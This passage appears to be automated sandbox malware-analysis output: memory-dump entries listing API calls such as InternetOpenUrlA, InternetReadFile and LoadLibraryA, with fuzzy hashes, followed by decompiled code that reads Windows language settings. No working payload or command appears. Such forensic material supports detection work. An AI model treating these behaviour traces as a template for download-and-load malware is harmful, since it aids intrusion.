                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 820c01e398c8ac914f2f4dd100bcc53ff887bca8876c1ce3cc12604a767d318d
                    • Instruction ID: 12287eadea413c02c96dc31a6597aa9f107054f34b476b8835cfdfd29960a1fc
                    • Opcode Fuzzy Hash: 820c01e398c8ac914f2f4dd100bcc53ff887bca8876c1ce3cc12604a767d318d
                    • Instruction Fuzzy Hash: E6517F20646B16EBEB35376C5D657F722E79F163A0FE94225DCC2875D2E32888C1C642
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8e5038dde8e7f07ae646b17e552c37e9d4603d57097b97616dc4954fefa9063b
                    • Instruction ID: 5759dfaaba83337f0057bba2311ab4a4aa4a396b7009db4c2f462f14da320a45
                    • Opcode Fuzzy Hash: 8e5038dde8e7f07ae646b17e552c37e9d4603d57097b97616dc4954fefa9063b
                    • Instruction Fuzzy Hash: 55419B35204306CEEF291E38C8A47F67B93BF72320FAA5169D946C74A1E33C88C5D601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: e4f6d4936681bae7ed82004eb08427368475e654e465bac59e5dd261f05f7652
                    • Instruction ID: 31d4c2a72f8bacda31977efca1180b8eb5abbc3b27d7eb081a521b1417b51d38
                    • Opcode Fuzzy Hash: e4f6d4936681bae7ed82004eb08427368475e654e465bac59e5dd261f05f7652
                    • Instruction Fuzzy Hash: 77418A35204306CEEB396E34C9A47F57793BF72320FAA5169D956C75A1E33C88C5D601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: d43752ed222de2f07a970f03f62b49e04636d42826f0873387e8b061e4c0ea28
                    • Instruction ID: 7dee3e326d57f75513370e819aac1e11c9b776b4a3035540adfd59ee99241571
                    • Opcode Fuzzy Hash: d43752ed222de2f07a970f03f62b49e04636d42826f0873387e8b061e4c0ea28
                    • Instruction Fuzzy Hash: F4416835200306CEEB292E38C9647E67793BF72320FAA5569D956C75A1E33C88C5DA01
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: da1907745b5f16c4153e732f3ab223196740eccdc58baa17209fcf62c5369363
                    • Instruction ID: 5b34e598bedc26c696222f4efe6381a1f3bfe620ac4d037d1aeb873943e79d11
                    • Opcode Fuzzy Hash: da1907745b5f16c4153e732f3ab223196740eccdc58baa17209fcf62c5369363
                    • Instruction Fuzzy Hash: DE317735200306CEEB292E34C8647E67793BF72320FAA5569D856C75B5D33C88C5DA01
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: cbe42170eda2a0b31139f48023a8f778f09492e3f8f65b2cdd921b6a5eb05a79
                    • Instruction ID: e0f2b12bde0f32e5c43591493c58eb6e434f7d1b7788c3763254469e876830c4
                    • Opcode Fuzzy Hash: cbe42170eda2a0b31139f48023a8f778f09492e3f8f65b2cdd921b6a5eb05a79
                    • Instruction Fuzzy Hash: C8314835600206CEEF292E38C8647E67BA2BF72320FEA5569C896C7571D37CC9C5DA41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: c93ce533108b93e81efe02108c1f0c7fa303f673b485247b83a5cfd542ac9bb5
                    • Instruction ID: ce78890ccda122f8cf6fccb4265ee049dd8ca64121fc635aebeaa89cbe86b1cf
                    • Opcode Fuzzy Hash: c93ce533108b93e81efe02108c1f0c7fa303f673b485247b83a5cfd542ac9bb5
                    • Instruction Fuzzy Hash: 06315835600206CEEF285E38C8647E67BA2BF72320FEA5569C896CB571D37CC8C5CA41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: 5cf53c7d16e79977f75a20c76f60ca71b611e1c225de6ef4e8165a3e437b22dd
                    • Instruction ID: 7552cf4d0b529f794ef121611e737e2604c5f716175ed54da2d02e06c3dabfb0
                    • Opcode Fuzzy Hash: 5cf53c7d16e79977f75a20c76f60ca71b611e1c225de6ef4e8165a3e437b22dd
                    • Instruction Fuzzy Hash: D5312735600206CEEB295E38C8647E57BD2BF72320FEA5169C896CB5B1D33CC9C9CA41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • TerminateThread.KERNELBASE(000000FE,00000000), ref: 001B1F98
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: TerminateThread
                    • String ID:
                    • API String ID: 1852365436-0
                    • Opcode ID: e92dd91ca125e63e3076cd073202b9e0c2120dea8f5831548b7e065d1ee819e1
                    • Instruction ID: fafa1b9d56115286c6506cbf8566599cd63f3a29c19f8287229ee6c0af451eea
                    • Opcode Fuzzy Hash: e92dd91ca125e63e3076cd073202b9e0c2120dea8f5831548b7e065d1ee819e1
                    • Instruction Fuzzy Hash: EE216870204315AFCB24AE6889E47EE3799DF1A360FB14316ED52C72D2D37288C9D523
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 001B3135
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: InternetOpen
                    • String ID:
                    • API String ID: 2038078732-0
                    • Opcode ID: feb18598b401ffec5788795f38330becb4956db7c97b57c4cc12237419fcc0f6
                    • Instruction ID: 79a09b409450758b3c802d3323b000ada9f28fcbe5497df2fb6456d990d9da1a
                    • Opcode Fuzzy Hash: feb18598b401ffec5788795f38330becb4956db7c97b57c4cc12237419fcc0f6
                    • Instruction Fuzzy Hash: 7021B63034034AABFB344E54CDA5BFB37A9DF11780F508028FE9AEA190E770D654EA10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f8160578b63f83e872e5b7f606f360f207e19262112eecf1df1a24175e0b2d09
                    • Instruction ID: 8dfbf6b705737975e349366365860a2af4f2468a44f962e7ed9d776eddabfbe1
                    • Opcode Fuzzy Hash: f8160578b63f83e872e5b7f606f360f207e19262112eecf1df1a24175e0b2d09
                    • Instruction Fuzzy Hash: 1F117494A0135AAAFF383AB05DA1BF612569F26770FF48226FD92D7083D359C8845603
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: 7d2cc9a9980ce75b53456217ff6a9159e5023449964feed892f952dc84ba6c43
                    • Instruction ID: d47d8e0a990f73e440dc20af3bb0e41e576c0087f05f412389adb6f2515da27c
                    • Opcode Fuzzy Hash: 7d2cc9a9980ce75b53456217ff6a9159e5023449964feed892f952dc84ba6c43
                    • Instruction Fuzzy Hash: 6F21F634601206CEEB245E34C8687E57BE2BF32320FD95559C89ACB5B4D338C9D5CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 952da18728ebe144b327b1e76ad01120048368fc77f65a97f3ddd1f7d23eecbc
                    • Instruction ID: 288f51b5e906cea62a4b69b17c477c4da94ff85b662b1137d8774baf64a03963
                    • Opcode Fuzzy Hash: 952da18728ebe144b327b1e76ad01120048368fc77f65a97f3ddd1f7d23eecbc
                    • Instruction Fuzzy Hash: 15012654A0125ABFEF2836F46D01BF722568F66BA0F98C12AFCC1C3047D724C8846643
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: fbafeb0e1a69d98279b6a8d12122e00519fee77eb97c5721d693cefb396c3f6e
                    • Instruction ID: 79f3e8c1230aeac3fec03095ddeadc44ef654b95dd0903e78b524f65515bb2cd
                    • Opcode Fuzzy Hash: fbafeb0e1a69d98279b6a8d12122e00519fee77eb97c5721d693cefb396c3f6e
                    • Instruction Fuzzy Hash: 3F112338A0020ACEEB255E34C8683E1BBE2BF32324FD95159C8898B471D338C9D4CA41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 001B3135
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: InternetOpen
                    • String ID:
                    • API String ID: 2038078732-0
                    • Opcode ID: bc856a6568525b9a6ff4c3e149fc0a0c30de5ec47769609975933ccb673777b1
                    • Instruction ID: eef5c46fa89ddcc4ed587aefa80c5e48720ab8538f1b070d9d5058b336842f7e
                    • Opcode Fuzzy Hash: bc856a6568525b9a6ff4c3e149fc0a0c30de5ec47769609975933ccb673777b1
                    • Instruction Fuzzy Hash: 9B11563024038BABFB348E55CDA5FFB77699F50780F548428ED9AEA140E770D654EA14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(?,595014AD,?,001B23F1,?,00000000,00000000,?,?,?,00000000,00000004,00000000,00000000,?,?), ref: 001B48E9
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: e79ac11a7ea172bd05ac55158044cc142db0d91c817158d68eacd1ff2f2a1aed
                    • Instruction ID: 8902b62fde5958e459d813571fa67d477215c668a0dbd8d539149b3c10f89fac
                    • Opcode Fuzzy Hash: e79ac11a7ea172bd05ac55158044cc142db0d91c817158d68eacd1ff2f2a1aed
                    • Instruction Fuzzy Hash: D5F02B54A41259FBEF3436B02D42BFB16598F65760FE5C116FCC1D60438328C8882A47
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(?,595014AD,?,001B23F1,?,00000000,00000000,?,?,?,00000000,00000004,00000000,00000000,?,?), ref: 001B48E9
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 2b9e6a41fd05225e4aaa53531420a76ff69fc221b9702e7bc46b208d47ddfb2f
                    • Instruction ID: a6006503581bc8466bc91c8faf44da1d173b96d4e2807b639288b6d793a4542a
                    • Opcode Fuzzy Hash: 2b9e6a41fd05225e4aaa53531420a76ff69fc221b9702e7bc46b208d47ddfb2f
                    • Instruction Fuzzy Hash: 82F02454A01248BBFF3437B11E027FB12A98F24710FE5C129FCC1DA003D728C8841A07
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(?,595014AD,?,001B23F1,?,00000000,00000000,?,?,?,00000000,00000004,00000000,00000000,?,?), ref: 001B48E9
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 8f9d8d9f4e7a368c85875c908b39264b3ed115b4f92ea2dc9bf63cb5483c7733
                    • Instruction ID: 8f4ce72ef63fde0cd4f04e9942b5e1defaee7159bd6286b668d10afd1be2c0e9
                    • Opcode Fuzzy Hash: 8f9d8d9f4e7a368c85875c908b39264b3ed115b4f92ea2dc9bf63cb5483c7733
                    • Instruction Fuzzy Hash: F4F0E544A01249FBDF343BB45D067EB26998F29764FD8D216FCD4EA183D728C4851B47
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: 2f58cb3c5456eac9d60582526df4f566d01b0efe435bd26f3126466fd99c82ce
                    • Instruction ID: 75ee35de0959c7cccb3de7d40c8c3276a2416e8312ef03ff85b611df511b5a88
                    • Opcode Fuzzy Hash: 2f58cb3c5456eac9d60582526df4f566d01b0efe435bd26f3126466fd99c82ce
                    • Instruction Fuzzy Hash: 87F0E526B813578DAB2A6A38C9B43E22B67BD733207CC4545CC85CB978F725C9D5C205
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(?,595014AD,?,001B23F1,?,00000000,00000000,?,?,?,00000000,00000004,00000000,00000000,?,?), ref: 001B48E9
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 86d1ae167f1264ff4e123195bd4254e48aca8fff0e1bf20852924967b30914b6
                    • Instruction ID: a8ba3c70811d9c947b1c834796f859ff7f8ebda9747885b5c4f05620308dacbf
                    • Opcode Fuzzy Hash: 86d1ae167f1264ff4e123195bd4254e48aca8fff0e1bf20852924967b30914b6
                    • Instruction Fuzzy Hash: B0D02E28A0031AF35F243F711D0ABDF22618D28B94BE8C255FCC4EB007CB38C0860E46
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,001B2D17,001B2DB4), ref: 001B2D9F
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 72377ccdd72571d04adc792edf7030eface8fb63f8d8763f2bcf66cff2b2072c
                    • Instruction ID: be21ac10a46487251ea4766ae79e9ebefdae682190105c2b5de3e35a789d3362
                    • Opcode Fuzzy Hash: 72377ccdd72571d04adc792edf7030eface8fb63f8d8763f2bcf66cff2b2072c
                    • Instruction Fuzzy Hash: 4DD0C974398304BAF9244920AD6BFD661175B92F84E90810DBF4D292C143E75951C516
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: 1b363aea7f51bcad3bb88953dae251e8b57876ea322b0870d96448b80e178b92
                    • Instruction ID: 6bb1d40b6e87a55ef1803b0a8aef0ba2c9e039474bc37fea8c6ef034706d8238
                    • Opcode Fuzzy Hash: 1b363aea7f51bcad3bb88953dae251e8b57876ea322b0870d96448b80e178b92
                    • Instruction Fuzzy Hash: F4D012245513054D7F196D71C6E438A3A666CA5104798891CD882D2518EB31C4498514
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    C-Code - Quality: 94%
                    			E1E9B8788(signed int __ecx, void* __edx, signed int _a4) {
                    				signed int _v8;
                    				short* _v12;
                    				void* _v16;
                    				signed int _v20;
                    				char _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				char _v36;
                    				signed int _v40;
                    				char _v44;
                    				signed int _v48;
                    				signed int _v52;
                    				signed int _v56;
                    				signed int _v60;
                    				char _v68;
                    				void* _t216;
                    				intOrPtr _t231;
                    				short* _t235;
                    				intOrPtr _t257;
                    				short* _t261;
                    				intOrPtr _t284;
                    				intOrPtr _t288;
                    				void* _t314;
                    				signed int _t318;
                    				short* _t319;
                    				intOrPtr _t321;
                    				void* _t328;
                    				void* _t329;
                    				char* _t332;
                    				signed int _t333;
                    				signed int* _t334;
                    				void* _t335;
                    				void* _t338;
                    				void* _t339;
                    
                    				_t328 = __edx;
                    				_t322 = __ecx;
                    				_t318 = 0;
                    				_t334 = _a4;
                    				_v8 = 0;
                    				_v28 = 0;
                    				_v48 = 0;
                    				_v20 = 0;
                    				_v40 = 0;
                    				_v32 = 0;
                    				_v52 = 0;
                    				if(_t334 == 0) {
                    					_t329 = 0xc000000d;
                    					L49:
                    					_t334[0x11] = _v56;
                    					 *_t334 =  *_t334 | 0x00000800;
                    					_t334[0x12] = _v60;
                    					_t334[0x13] = _v28;
                    					_t334[0x17] = _v20;
                    					_t334[0x16] = _v48;
                    					_t334[0x18] = _v40;
                    					_t334[0x14] = _v32;
                    					_t334[0x15] = _v52;
                    					return _t329;
                    				}
                    				_v56 = 0;
                    				if(E1E9B8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                    					_v56 = 1;
                    					if(_v8 != 0) {
                    						_t207 = E1E99E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                    					}
                    					_push(1);
                    					_v8 = _t318;
                    					E1E9B718A(_t207);
                    					_t335 = _t335 + 4;
                    				}
                    				_v60 = _v60 | 0xffffffff;
                    				if(E1E9B8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                    					_t333 =  *_v8;
                    					_v60 = _t333;
                    					_t314 = E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                    					_push(_t333);
                    					_v8 = _t318;
                    					E1E9B718A(_t314);
                    					_t335 = _t335 + 4;
                    				}
                    				_t216 = E1E9B8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                    				_t332 = ";";
                    				if(_t216 < 0) {
                    					L17:
                    					if(E1E9B8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                    						L30:
                    						if(E1E9B8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                    							L46:
                    							_t329 = 0;
                    							L47:
                    							if(_v8 != _t318) {
                    								E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                    							}
                    							if(_v28 != _t318) {
                    								if(_v20 != _t318) {
                    									E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                    									_v20 = _t318;
                    									_v40 = _t318;
                    								}
                    							}
                    							goto L49;
                    						}
                    						_t231 = _v24;
                    						_t322 = _t231 + 4;
                    						_push(_t231);
                    						_v52 = _t322;
                    						E1E9B718A(_t231);
                    						if(_t322 == _t318) {
                    							_v32 = _t318;
                    						} else {
                    							_v32 = E1E99E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                    						}
                    						if(_v32 == _t318) {
                    							_v52 = _t318;
                    							L58:
                    							_t329 = 0xc0000017;
                    							goto L47;
                    						} else {
                    							E1E992340(_v32, _v8, _v24);
                    							_v16 = _v32;
                    							_a4 = _t318;
                    							_t235 = E1E9AE679(_v32, _t332);
                    							while(1) {
                    								_t319 = _t235;
                    								if(_t319 == 0) {
                    									break;
                    								}
                    								 *_t319 = 0;
                    								_t321 = _t319 + 2;
                    								E1E99E2A8(_t322,  &_v68, _v16);
                    								if(E1E9B5553(_t328,  &_v68,  &_v36) != 0) {
                    									_a4 = _a4 + 1;
                    								}
                    								_v16 = _t321;
                    								_t235 = E1E9AE679(_t321, _t332);
                    								_pop(_t322);
                    							}
                    							_t236 = _v16;
                    							if( *_v16 != _t319) {
                    								E1E99E2A8(_t322,  &_v68, _t236);
                    								if(E1E9B5553(_t328,  &_v68,  &_v36) != 0) {
                    									_a4 = _a4 + 1;
                    								}
                    							}
                    							if(_a4 == 0) {
                    								E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                    								_v52 = _v52 & 0x00000000;
                    								_v32 = _v32 & 0x00000000;
                    							}
                    							if(_v8 != 0) {
                    								E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                    							}
                    							_v8 = _v8 & 0x00000000;
                    							_t318 = 0;
                    							goto L46;
                    						}
                    					}
                    					_t257 = _v24;
                    					_t322 = _t257 + 4;
                    					_push(_t257);
                    					_v40 = _t322;
                    					E1E9B718A(_t257);
                    					_t338 = _t335 + 4;
                    					if(_t322 == _t318) {
                    						_v20 = _t318;
                    					} else {
                    						_v20 = E1E99E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                    					}
                    					if(_v20 == _t318) {
                    						_v40 = _t318;
                    						goto L58;
                    					} else {
                    						E1E992340(_v20, _v8, _v24);
                    						_v16 = _v20;
                    						_a4 = _t318;
                    						_t261 = E1E9AE679(_v20, _t332);
                    						_t335 = _t338 + 0x14;
                    						while(1) {
                    							_v12 = _t261;
                    							if(_t261 == _t318) {
                    								break;
                    							}
                    							_v12 = _v12 + 2;
                    							 *_v12 = 0;
                    							E1E99E2A8(_v12,  &_v68, _v16);
                    							if(E1E9B5553(_t328,  &_v68,  &_v36) != 0) {
                    								_a4 = _a4 + 1;
                    							}
                    							_v16 = _v12;
                    							_t261 = E1E9AE679(_v12, _t332);
                    							_pop(_t322);
                    						}
                    						_t269 = _v16;
                    						if( *_v16 != _t318) {
                    							E1E99E2A8(_t322,  &_v68, _t269);
                    							if(E1E9B5553(_t328,  &_v68,  &_v36) != 0) {
                    								_a4 = _a4 + 1;
                    							}
                    						}
                    						if(_a4 == _t318) {
                    							E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                    							_v40 = _t318;
                    							_v20 = _t318;
                    						}
                    						if(_v8 != _t318) {
                    							E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                    						}
                    						_v8 = _t318;
                    						goto L30;
                    					}
                    				}
                    				_t284 = _v24;
                    				_t322 = _t284 + 4;
                    				_push(_t284);
                    				_v48 = _t322;
                    				E1E9B718A(_t284);
                    				_t339 = _t335 + 4;
                    				if(_t322 == _t318) {
                    					_v28 = _t318;
                    				} else {
                    					_v28 = E1E99E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                    				}
                    				if(_v28 == _t318) {
                    					_v48 = _t318;
                    					goto L58;
                    				} else {
                    					E1E992340(_v28, _v8, _v24);
                    					_v16 = _v28;
                    					_a4 = _t318;
                    					_t288 = E1E9AE679(_v28, _t332);
                    					_t335 = _t339 + 0x14;
                    					while(1) {
                    						_v12 = _t288;
                    						if(_t288 == _t318) {
                    							break;
                    						}
                    						_v12 = _v12 + 2;
                    						 *_v12 = 0;
                    						E1E99E2A8(_v12,  &_v68, _v16);
                    						if(E1E9B5553(_t328,  &_v68,  &_v36) != 0) {
                    							_a4 = _a4 + 1;
                    						}
                    						_v16 = _v12;
                    						_t288 = E1E9AE679(_v12, _t332);
                    						_pop(_t322);
                    					}
                    					_t296 = _v16;
                    					if( *_v16 != _t318) {
                    						E1E99E2A8(_t322,  &_v68, _t296);
                    						if(E1E9B5553(_t328,  &_v68,  &_v36) != 0) {
                    							_a4 = _a4 + 1;
                    						}
                    					}
                    					if(_a4 == _t318) {
                    						E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                    						_v48 = _t318;
                    						_v28 = _t318;
                    					}
                    					if(_v8 != _t318) {
                    						E1E99E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                    					}
                    					_v8 = _t318;
                    					goto L17;
                    				}
                    			}

                    0x1e9b8845
                    0x1e9b8848
                    0x1e9b884d
                    0x1e9b8852
                    0x1e9b8b49
                    0x1e9b8858
                    0x1e9b886c
                    0x1e9b886c
                    0x1e9b8872
                    0x1ea01b0e
                    0x00000000
                    0x1e9b8878
                    0x1e9b8881
                    0x1e9b888b
                    0x1e9b888e
                    0x1e9b8891
                    0x1e9b8896
                    0x1e9b8899
                    0x1e9b8899
                    0x1e9b889e
                    0x00000000
                    0x00000000
                    0x1ea01b21
                    0x1ea01b27
                    0x1ea01b2e
                    0x1ea01b42
                    0x1ea01b44
                    0x1ea01b44
                    0x1ea01b4c
                    0x1ea01b4f
                    0x1ea01b55
                    0x1ea01b55
                    0x1e9b88a4
                    0x1e9b88aa
                    0x1e9b88b1
                    0x1e9b88c5
                    0x1ea01b5b
                    0x1ea01b5b
                    0x1e9b88c5
                    0x1e9b88ce
                    0x1e9b88e0
                    0x1e9b88e5
                    0x1e9b88e8
                    0x1e9b88e8
                    0x1e9b88ee
                    0x1e9b8900
                    0x1e9b8900
                    0x1e9b8905
                    0x00000000
                    0x1e9b8905

                    APIs
                    Strings
                    • Kernel-MUI-Language-SKU, xrefs: 1E9B89FC
                    • Kernel-MUI-Number-Allowed, xrefs: 1E9B87E6
                    • WindowsExcludedProcs, xrefs: 1E9B87C1
                    • Kernel-MUI-Language-Disallowed, xrefs: 1E9B8914
                    • Kernel-MUI-Language-Allowed, xrefs: 1E9B8827
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: _wcspbrk
                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                    • API String ID: 402402107-258546922
                    • Opcode ID: 042f0cdc2b6a7ead6317a2112f6fde97d9549298915c98d61fc726066c3e8d34
                    • Instruction ID: c0648b6b7dcf2e7ffe103e0f1c4c9119131cf723931002540e6fae221dfc6b5d
                    • Opcode Fuzzy Hash: 042f0cdc2b6a7ead6317a2112f6fde97d9549298915c98d61fc726066c3e8d34
                    • Instruction Fuzzy Hash: 8BF1A3B6D00249EFCF11DFA5D980DEEB7B9FB48200F114A6EE505AB210E735AA45DF60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 64%
                    			E1E9C7EFD(void* __ecx, intOrPtr _a4) {
                    				signed int _v8;
                    				char _v540;
                    				unsigned int _v544;
                    				signed int _v548;
                    				intOrPtr _v552;
                    				char _v556;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t33;
                    				void* _t38;
                    				unsigned int _t46;
                    				unsigned int _t47;
                    				unsigned int _t52;
                    				intOrPtr _t56;
                    				unsigned int _t62;
                    				void* _t69;
                    				void* _t70;
                    				intOrPtr _t72;
                    				signed int _t73;
